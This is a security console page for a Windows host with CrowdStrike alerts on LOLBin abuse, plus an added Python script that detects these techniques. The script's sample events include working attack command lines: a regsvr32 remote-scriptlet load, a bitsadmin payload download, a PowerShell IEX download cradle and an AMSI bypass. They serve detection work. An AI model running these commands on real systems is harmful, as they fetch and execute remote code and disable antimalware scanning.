BOOK-R0BE6S1NC3
Normal
- Device ID: 024efd237c2d4f87958607652cb04c8b
- Hostname: BOOK-R0BE6S1NC3
- Local IP: 172.27.1.19
- External IP: 119.206.248.238
- Platform: Windows
- OS version: Windows 11
- Agent version: 7.31.20309.0
- First seen: 2025-12-18 08:48:15 (UTC+09:00)
- Last seen: 2025-12-22 08:28:33 (UTC+09:00)
Tags
No tags
Related Alerts
View all
| Severity | Description | Time (UTC+09:00) |
|---|---|---|
| Informational | A suspicious process was identified by CrowdStrike. Review the process tree. | 12-22 08:07 |
| Informational | A suspicious process was identified by CrowdStrike. Review the process tree. | 12-22 08:07 |
| Informational | A process has written a known EICAR test file. Review the files written by the triggered process. | 12-22 08:02 |
| High | A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a COM object. Review the script passed to scrobj.dll on the command line. | 12-22 08:02 |
| High | A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. Review the command line. | 12-22 08:02 |
| High | A PowerShell script attempted to bypass Microsoft's Antimalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. | 12-22 08:02 |
| High | A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. | 12-22 08:02 |
| High | A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. | 12-22 08:02 |
| Informational | A process has written a known EICAR test file. Review the files written by the triggered process. | 12-22 08:01 |
| High | A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. | 12-22 08:01 |
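The five High-severity alerts above each point the analyst at a command line (the script after `/i:`, the INF handed to CMSTP, the AMSI field reference, the bitsadmin transfer job, the URL in the PowerShell cradle). The script below is an added illustration of pre-screening process command lines for those same behaviours before opening each process tree; it is not code from this page or from CrowdStrike, the regexes are my own approximations rather than Falcon's detection logic, and the process events (PIDs, parents, the 198.51.100.7 test address) are constructed samples, including three benign look-alikes that must not fire.

```python
"""
Command-line triage for the LOLBin techniques named in the alert list.

Added illustration: the rules are my own regex approximations of the
behaviours the alerts describe, not CrowdStrike's detection logic, and
SAMPLE_EVENTS are constructed, not telemetry from the host on this page.
"""
import re
from dataclasses import dataclass

PS = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)


@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    patterns: tuple  # every pattern must match the command line
    review: str      # what the analyst should look at next


RULES = (
    # Squiblydoo: regsvr32 /s /n /u /i:<script> scrobj.dll
    Rule("regsvr32_squiblydoo", "High",
         (re.compile(r"\bregsvr32(\.exe)?\b", re.I),
          re.compile(r"\s/i:\S+", re.I),
          re.compile(r"\bscrobj\.dll\b", re.I)),
         "script passed to scrobj.dll via /i:"),
    # CMSTP given an INF. Legitimate connection-manager installs do this too,
    # so the INF contents decide; this rule only surfaces candidates.
    Rule("cmstp_inf", "High",
         (re.compile(r"\bcmstp(\.exe)?\b", re.I),
          re.compile(r"\S+\.inf\b", re.I)),
         "INF file supplied to cmstp.exe"),
    # Reflection against AmsiUtils / amsiInitFailed, the usual AMSI bypass
    Rule("powershell_amsi_bypass", "High",
         (PS, re.compile(r"\b(AmsiUtils|amsiInitFailed|AmsiScanBuffer)\b", re.I)),
         "script content around the AMSI field or function reference"),
    # bitsadmin used as a downloader
    Rule("bitsadmin_download", "High",
         (re.compile(r"\bbitsadmin(\.exe)?\b", re.I),
          re.compile(r"\s/(transfer|addfile)\b", re.I),
          re.compile(r"\b(https?|ftp)://", re.I)),
         "remote URL and local destination of the transfer job"),
    # Download cradle: fetch content, then execute it
    Rule("powershell_download_cradle", "High",
         (PS,
          re.compile(r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|WebClient)\b", re.I),
          re.compile(r"\b(iex|Invoke-Expression|Start-Process)\b", re.I)),
         "URL in the command line and what was launched afterwards"),
)

# A cradle spawned by an Office process is consistent with a malicious macro
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    pid: int
    parent: str
    cmdline: str
    note: str


def triage(events):
    """Return one Finding per (event, rule) pair whose patterns all match."""
    findings = []
    for ev in events:
        for rule in RULES:
            if all(p.search(ev["cmdline"]) for p in rule.patterns):
                note = rule.review
                if rule.name == "powershell_download_cradle" and ev["parent"].lower() in OFFICE_PARENTS:
                    note += "; parent is an Office application, consistent with a macro dropper"
                findings.append(Finding(rule.name, rule.severity, ev["pid"], ev["parent"], ev["cmdline"], note))
    return findings


def by_severity(findings):
    """Count findings per severity, e.g. {'High': 5}."""
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed sample events (hypothetical PIDs; 198.51.100.7 is a documentation address)
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "cmd.exe", "cmdline": r"regsvr32.exe /s /n /u /i:http://198.51.100.7/payload.sct scrobj.dll"},
    {"pid": 4133, "parent": "cmd.exe", "cmdline": r"cmstp.exe /ni /s C:\Users\Public\launch.inf"},
    {"pid": 4140, "parent": "explorer.exe", "cmdline": r"powershell.exe -nop -c [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"pid": 4151, "parent": "cmd.exe", "cmdline": r"bitsadmin.exe /transfer job1 /download /priority high http://198.51.100.7/stage2.exe C:\Users\Public\stage2.exe"},
    {"pid": 4162, "parent": "WINWORD.EXE", "cmdline": r"powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"},
    # benign look-alikes: same binaries, none of the abuse markers
    {"pid": 4170, "parent": "msiexec.exe", "cmdline": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},
    {"pid": 4171, "parent": "cmd.exe", "cmdline": r"bitsadmin.exe /list /allusers"},
    {"pid": 4172, "parent": "explorer.exe", "cmdline": r"powershell.exe -Command Get-Process | Sort-Object CPU"},
]

if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for f in hits:
        print(f"[{f.severity}] {f.rule} pid={f.pid} parent={f.parent}\n    {f.cmdline}\n    review: {f.note}")
    print(by_severity(hits))
```

Run against the sample set it yields exactly five findings, one per High alert type, and the Office-parented cradle carries the extra macro note; the `/s`-only regsvr32, `bitsadmin /list` and plain PowerShell command stay silent. The CMSTP rule is deliberately coarse, matching the alert's own wording that the INF is what needs review.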
Raw JSON Data
```json
{
  "device_id": "024efd237c2d4f87958607652cb04c8b",
  "cid": "84393bf974fd44bda943a25a6a7bc27f",
  "agent_version": "7.31.20309.0",
  "hostname": "BOOK-R0BE6S1NC3",
  "local_ip": "172.27.1.19",
  "external_ip": "119.206.248.238",
  "mac_address": "00-72-ee-3e-51-84",
  "platform_name": "Windows",
  "os_version": "Windows 11",
  "system_product_name": "960QHA",
  "status": "normal",
  "first_seen": "2025-12-17T23:48:15Z",
  "last_seen": "2025-12-21T23:28:33Z",
  "tags": [],
  "groups": ["4f5aa5f1cdc6441982cf5c58e4b5d75a"],
  "group_hash": "fb152e9135984fe6b0778b98d0f86fd4060a555e6c7baa220904d1a05b5e7961",
  "policies": [
    {
      "policy_type": "prevention",
      "policy_id": "64c665c08ab745759d0a84d7db7a784d",
      "applied": true,
      "applied_date": "2025-12-18T00:00:22.989910659Z"
    }
  ],
  "reduced_functionality_mode": "no",
  "is_online": false,
  "FirstSeenAt": "2025-12-18T08:48:15+09:00",
  "LastSeenAt": "2025-12-22T08:28:33+09:00"
}
```
Status
- Connection: Offline
- Isolation: Normal (not network-contained)
- Related alerts: 10
Actions
Uninstall Token
Token required to uninstall the sensor. Only needed when Uninstall Protection is enabled.